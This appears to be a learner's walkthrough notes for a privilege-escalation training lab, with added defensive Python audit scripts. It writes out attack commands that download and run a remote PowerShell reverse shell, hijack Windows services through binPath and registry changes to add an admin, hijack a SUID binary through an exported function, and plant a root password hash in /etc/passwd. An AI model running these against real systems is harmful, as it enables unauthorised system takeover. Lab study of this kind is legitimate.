Practising Privilege Escalation (sagishahar lpeworkshop)
Link to exercise: https://github.com/sagishahar/lpeworkshop
---------------------------------------------------------------------------------------
Questions: https://github.com/sagishahar/lpeworkshop/blob/master/Lab%20Exercises%20Walkthrough%20-%20Linux.pdf
Exercise 1 - Kernel
uname -a (check the kernel version)
use Google or searchsploit to check whether that kernel version has a known exploit
more info from liveoverflow about dirtycow:
https://www.youtube.com/watch?v=kEsshExn7aE&vl=en
Exercise 2 - Daemons
Basic recon: LinEnum, linuxprivchecker, LinPEAS, Linux Exploit Suggester and pspy
and check the running services against searchsploit
Exercise 6 - Sudo (Shell Escape Sequences)
sudo -l and search GTFOBins for any shell escapes
Exercise 7 - Sudo (Abusing Intended Features)
if a sudo-allowed binary is not listed in GTFOBins, check the binary itself for bugs
Exercise 8 - Sudo (LD_PRELOAD)
more info:
https://www.boiteaklou.fr/Abusing-Shared-Libraries.html
Exercise 9 - NFS
mount the export on your own system and create files as root (root is not squashed, i.e. no_root_squash, so they keep root ownership)
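A check for the root-squash point above, as an added example that is not part of these notes or of the workshop: it parses /etc/exports text and flags exports where no_root_squash lets a remote root keep uid 0 on the server. The sample exports lines are constructed; the default-option handling (root squashing on, read-only unless overridden, no client meaning any host) is an assumption based on exports(5).

```python
# Constructed /etc/exports sample; not from the workshop VM.
SAMPLE_EXPORTS = """\
# /etc/exports
/srv/share      *(rw,sync,no_root_squash)
/home/backup    10.0.0.0/24(rw,sync,root_squash) admin.lab(rw,no_subtree_check)
/var/www        192.168.1.5(ro)
"""


def parse_exports(text):
    """Return one dict per (path, client) pair with the options that matter here.
    Defaults follow exports(5): root squashing on, read-only, unless overridden."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]  # no client listed = any host (assumption)
        for client in clients:
            host, _, opts = client.partition("(")
            options = [o.strip() for o in opts.rstrip(")").split(",") if o.strip()]
            entries.append({
                "path": path,
                "host": host or "*",          # "(rw)" with no host also means any host
                "writable": "rw" in options,
                "root_squash": "no_root_squash" not in options,
            })
    return entries


def risky_exports(text):
    """Exports where a remote root keeps uid 0 on the server. Rated 'critical' when
    the export is also writable and open to any host, 'high' otherwise."""
    findings = []
    for e in parse_exports(text):
        if e["root_squash"]:
            continue
        severity = "critical" if e["writable"] and e["host"] == "*" else "high"
        findings.append((e["path"], e["host"], severity))
    return findings


if __name__ == "__main__":
    for path, host, severity in risky_exports(SAMPLE_EXPORTS):
        print(f"{severity}: {path} exported to {host} with no_root_squash")
```

Run it against the real file with risky_exports(open("/etc/exports").read()) on the NFS server; any finding means root on a client that can mount the share is root on those files.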
Exercise 10 - Cron (Path)
checking cronjobs: pspy, crontab -l, cat /etc/crontab
checking whether a cron binary is vulnerable to PATH hijacking: echo $PATH or use LinPEAS
more info on path:
https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
more info: check out ippsec's Nineveh video to create your own script to catch cronjobs
https://www.youtube.com/watch?v=K9DKULxSBK4&t=1890s
Exercise 11 - Cron (Wildcards)
turning * into command options (e.g. tar) and exploiting shell escapes:
https://gtfobins.github.io/gtfobins/tar/
Exercise 12 - Cron (File Overwrite)
bad permissions:
find world-writable files
find / -perm -o+w 2>/dev/null
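An audit for exercises 10 and 12 together, as an added example that is not part of these notes or of the workshop: it parses a system crontab, and for each job flags a relative command name when a directory in the PATH in effect is world-writable (or empty/"."), and an absolute script that anyone can overwrite. The crontab text is constructed; demo() swaps in a throwaway world-writable directory and script so the checks fire on any Linux box.

```python
import os
import re
import stat
import tempfile

# Constructed system-crontab sample (not from the workshop). The PATH line ends
# with a placeholder directory that demo() replaces with a world-writable one.
SAMPLE_CRONTAB = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/cron_tools
* * * * * root overwrite.sh
*/5 * * * * root /usr/bin/compress.sh
@reboot root /bin/backup.sh --full
"""

ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")


def parse_crontab(text):
    """Parse system-crontab text; each entry records the PATH in effect for it."""
    env = {"PATH": "/usr/bin:/bin"}  # cron's built-in default search path
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ENV_LINE.match(line):
            key, _, value = line.partition("=")
            env[key.strip()] = value.strip().strip('"')
            continue
        if line.startswith("@"):            # @reboot/@daily  user  command
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2]
        else:                               # min hour dom mon dow  user  command
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        entries.append({"path": env["PATH"], "user": user, "command": command})
    return entries


def world_writable(path):
    """True if path exists and others may write to it (sticky dirs excluded)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    if stat.S_ISDIR(mode) and mode & stat.S_ISVTX:
        return False
    return bool(mode & stat.S_IWOTH)


def audit_crontab(text):
    """Findings: ('path-hijack', user, binary, weak PATH dir) for relative commands,
    ('file-overwrite', user, script, script) for absolute scripts anyone can edit."""
    findings = []
    for entry in parse_crontab(text):
        binary = entry["command"].split()[0]
        if not binary.startswith("/"):
            for d in entry["path"].split(":"):
                if d in ("", ".") or world_writable(d):
                    findings.append(("path-hijack", entry["user"], binary, d))
        elif world_writable(binary):
            findings.append(("file-overwrite", entry["user"], binary, binary))
    return findings


def demo():
    """Create a throwaway world-writable tools dir and script, then audit the sample."""
    base = tempfile.mkdtemp(prefix="cron_audit_")
    tools = os.path.join(base, "tools")
    os.mkdir(tools)
    os.chmod(tools, 0o777)
    script = os.path.join(base, "compress.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/sh\ntar czf /tmp/backup.tgz /var/log\n")
    os.chmod(script, 0o777)
    text = SAMPLE_CRONTAB.replace("/opt/cron_tools", tools)
    text = text.replace("/usr/bin/compress.sh", script)
    return audit_crontab(text)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The fix on the defending side is the mirror image of each finding: absolute paths in cron commands, a PATH line in /etc/crontab that contains only root-owned directories, and no group/other write bit on anything cron runs.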
Exercise 13 - File Permissions (Suid Binary - .so Injection)
Binaries attempting to load missing .so files
Exercise 14 - File Permissions (Suid Binary - Symlinks)
symlink a file you own -> a file owned by root
ln -s /home/user/user_file /root
(the suid binary will follow the link and access the /root file)
for example, tar -cvf /home/user/backup.tar /home/user/user_file
(extract backup.tar to get the contents of the /root file)
more info: https://percussiveelbow.github.io/linux-privesc/
Exercise 15 and 16 - File Permissions (Environment Variables)
# strings execute_me: /usr/bin/service apache2 start
check the SUID binary with strings to see what it runs (here: service without a full path)
function /usr/bin/service() { whoami; } <- create function
export -f /usr/bin/service <- link function to env
export -f (with no name, lists the exported functions, to check the function you just created)
# strings execute_me2: service apache2 start
alternatively:
function service() { whoami; }
---------------------------------------------------------------------------------------
Exercise 2 - Services (DLL Hijacking)
DLL hijacking works by placing your own DLL in a writable path from which a service attempts to load a DLL that is missing, hence the "NAME NOT FOUND" result in Procmon
Kali:
Use nishang's Invoke-PowerShellTcp.ps1:
https://github.com/samratashok/nishang
type this command in PowerShell on the Windows box to get a shell:
IEX (new-object net.webclient).downloadstring('http://x.x.x.x/x.ps1')
use certutil.exe -urlcache -split -f <url> <file_name> to download a file.
change the shell script to another port and listen on that port.
run start-service dllsvc to make the service load your DLL.
instead of using Procmon you can use PowerSploit's Privesc module (PowerUp):
https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Exercise 3 - Services (binPath)
Replacing the binPath of a service with your command makes the service run that instead of starting the original executable.
Check the permissions on every service for "Everyone".
While doing exercise 3 I noticed that when I started daclsvc, it errored out,
but it still ran the command (to add the user to the admin group) anyway.
#sc config daclsvc binpath= "net localgroup administrators user /add"
After trying IEX and certutil, it didn't work, probably some encoding issue.
When looking for more reverse shells I tried mshta, and it seemed to work.
more info: https://github.com/freshness79/HTA-Shell
Exercise 4 - Services (Unquoted Path)
Command: https://pentestlab.blog/2017/03/09/unquoted-service-path/
Windows tries each space-separated prefix of an unquoted path in turn (appending .exe), hence the service would run common.exe first.
Exercise 5 - Services (Registry)
Alternatively, you can use 'everyone allow fullcontrol'
Command: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\common.exe /f
#change registry to point to path of your executable
Exercise 6 - Services (Executable File)
Copy and paste the .exe as moving it will use the permissions of "File Permissions Service" which you do not have access to.
All edited programs/code referenced from: https://github.com/sagishahar/lpeworkshop
Privilege Escalation: Library Hijacking
Exploit cronjobs running python script
---------------------------------------------------------------------------------------
Python script:
since the script imports the calendar library, we will use the file /usr/lib/python2.7/calendar.py (easily found in the Python documentation)
add a reverse shell payload to the end:
source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
wait for the script to run:
---------------------------------------------------------------------------------------
Stricter imports:
Through globals() we can find what has been imported
'day_name': <calendar._localized_day instance at 0x...>
---------------------------------------------------------------------------------------
Pivoting through different imports:
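The defensive side of the library-hijacking section, as an added example that is not part of these notes or of the workshop: it reports which module search-path entries anyone can write to and where a given import would actually resolve, plus whether that file is writable by others. demo() builds a constructed module named demo_lib in a throwaway world-writable directory placed ahead of sys.path; the directory, module name and VERSION constant are all assumptions made for the demo.

```python
import importlib.machinery
import os
import stat
import sys
import tempfile


def others_can_write(path):
    """True if users other than the owner/group may write to path."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def writable_search_dirs(search_path):
    """Entries of a module search path that anyone can write to. An empty entry
    means the current working directory, which is whatever cron ran from."""
    return [d for d in search_path if d == "" or others_can_write(d)]


def resolve_module(name, search_path):
    """(origin file, writable-by-others) for the file an `import name` would load
    when searched along search_path, or None if nothing is found."""
    spec = importlib.machinery.PathFinder.find_spec(name, search_path)
    if spec is None or not spec.origin:
        return None
    return spec.origin, others_can_write(spec.origin)


def demo():
    """Build a throwaway world-writable directory ahead of sys.path holding a
    constructed module demo_lib, then show where imports would resolve."""
    tmp = tempfile.mkdtemp(prefix="import_audit_")
    os.chmod(tmp, 0o777)
    module_file = os.path.join(tmp, "demo_lib.py")
    with open(module_file, "w") as fh:
        fh.write("VERSION = 1\n")          # constructed module body
    os.chmod(module_file, 0o666)
    search_path = [tmp] + sys.path
    return {
        "writable_dirs": writable_search_dirs(search_path),
        "demo_lib": resolve_module("demo_lib", search_path),
        "calendar": resolve_module("calendar", sys.path),  # the stdlib module the notes target
    }


if __name__ == "__main__":
    report = demo()
    print("writable search dirs:", report["writable_dirs"])
    print("demo_lib resolves to:", report["demo_lib"])
    print("calendar resolves to:", report["calendar"])
```

Running resolve_module("calendar", sys.path) as the user that cron runs the script as is the direct check for the workshop's scenario: if the origin is writable by others, the cron job trusts code that anyone can replace.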
Privilege Escalation: priority of /etc/shadow and /etc/passwd
# making a password hash
openssl passwd password (1oCs2Y6GOzDm2)
openssl passwd pass (mV.TZP57qoG6s)
source: Editing /etc/passwd File for Privilege Escalation
---------------------------------------------------------------------------------------
# changing /etc/passwd: root:password
---------------------------------------------------------------------------------------
# /etc/shadow: root has no login (default)
# trying to log in to root with password: success
---------------------------------------------------------------------------------------
# changing /etc/shadow: root:pass
Conclusion: a hash in the password field of /etc/passwd takes precedence over /etc/shadow (/etc/passwd > /etc/shadow)
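A detection for exactly the conclusion above, as an added example that is not part of these notes or of the workshop: it parses /etc/passwd text and flags any account whose password field holds a hash (which login honours ahead of /etc/shadow), an empty password field, or a second uid-0 account, and separately reports whether the real /etc/passwd is writable by group or others. The sample passwd text is constructed; its root line reuses the hash the notes produced with openssl passwd password.

```python
import os
import stat

# Constructed /etc/passwd sample (not from a real host). The root line carries the
# crypt hash the notes generated with `openssl passwd password`; backup is a second
# uid-0 account; the others are normal.
SAMPLE_PASSWD = """\
root:1oCs2Y6GOzDm2:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
backup:x:0:34:backup:/var/backups:/bin/sh
user:x:1000:1000:user:/home/user:/bin/bash
"""

LOCKED = ("x", "*", "!", "!!")   # values meaning "look in /etc/shadow" or "locked"


def parse_passwd(text):
    """Rows of name, password field, uid and shell; malformed lines are skipped."""
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        rows.append({"name": fields[0], "pw": fields[1], "uid": int(fields[2]),
                     "shell": fields[6]})
    return rows


def audit_passwd(text):
    """Findings, in file order:
    hash-in-passwd  - field 2 holds a hash, which login uses instead of /etc/shadow
    empty-password  - field 2 is empty, so no password is asked for
    extra-uid0      - an account other than root with uid 0"""
    findings = []
    for row in parse_passwd(text):
        if row["pw"] == "":
            findings.append((row["name"], "empty-password"))
        elif row["pw"] not in LOCKED and not row["pw"].startswith("!"):
            findings.append((row["name"], "hash-in-passwd"))
        if row["uid"] == 0 and row["name"] != "root":
            findings.append((row["name"], "extra-uid0"))
    return findings


def passwd_file_writable(path="/etc/passwd"):
    """True if group or others can write the file, the precondition for the trick above."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    print("writable /etc/passwd:", passwd_file_writable())
    for name, kind in audit_passwd(SAMPLE_PASSWD):
        print(f"{kind}: {name}")
```

audit_passwd(open("/etc/passwd").read()) on a live host should return an empty list; a hash-in-passwd finding for root is the post-exploitation state the notes end with, and is cheap to alert on from a file-integrity monitor.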